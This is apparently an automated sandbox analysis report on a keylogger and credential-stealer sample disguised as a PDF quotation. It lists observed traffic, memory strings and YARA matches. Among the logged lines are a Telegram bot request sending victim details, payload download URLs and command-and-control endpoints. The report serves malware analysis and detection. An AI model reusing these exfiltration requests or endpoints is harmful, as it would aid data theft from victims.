Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2028/07/2024%20/%2001:17:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/v4mecse6/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: UTMEMUS UTMEMUS
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: VADAVOES VADAVOES
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic

TCP traffic: 192.168.2.4:49758 -> 185.123.204.162:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /data-package/v4mecse6/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/iiz1WoiTc5zb HTTP/1.1Host: s22.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2028/07/2024%20/%2001:17:10%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/v4mecse6/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: s22.filetransfer.io
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: investms.vadavo.cloud

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 27 Jul 2024 09:02:30 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://filetransfer.io/data-package/v4mecse6/download
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://investms.vadavo.cloud
Source: MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.i.lencr.org/0
Source: MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r10.o.lencr.org0#
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737B71000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E20E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: MSBuild.exe, 0000000A.00000002.2906657414.00000250E0478000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E22C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2920294754.00000250FA8F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E22FC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E2331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E22F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en8
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737BCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737BCE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filetransfer.io/data-package/v4mecse6/download
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E2150000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E21C6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E21F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343518240.000001375067E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D81000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2905870763.0000000140002000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E2150000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E217E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s22.filetransfer.io
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737BFE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s22.filetransfer.io/storage/download/iiz1WoiTc5zb
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2333864678.0000013737C7F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747D33000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2343226980.0000013750490000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2339758590.0000013747B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F220F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2489000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F23B3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2237000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2212000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F219D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2464000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2341000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F236C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F220F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2908019258.00000250E221F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2489000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F23B3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2237000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F21C8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2212000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F219D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2464000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F2341000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2914938706.00000250F236C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MSBuild.exe, 0000000A.00000002.2914938706.00000250F2109000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E2331000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: MSBuild.exe, 0000000A.00000002.2908019258.00000250E232C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/8

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49757 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.MSBuild.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0.2.QUOTATION_JULQTRA071244#U00b7PDF.scr.exe.13747dfae18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
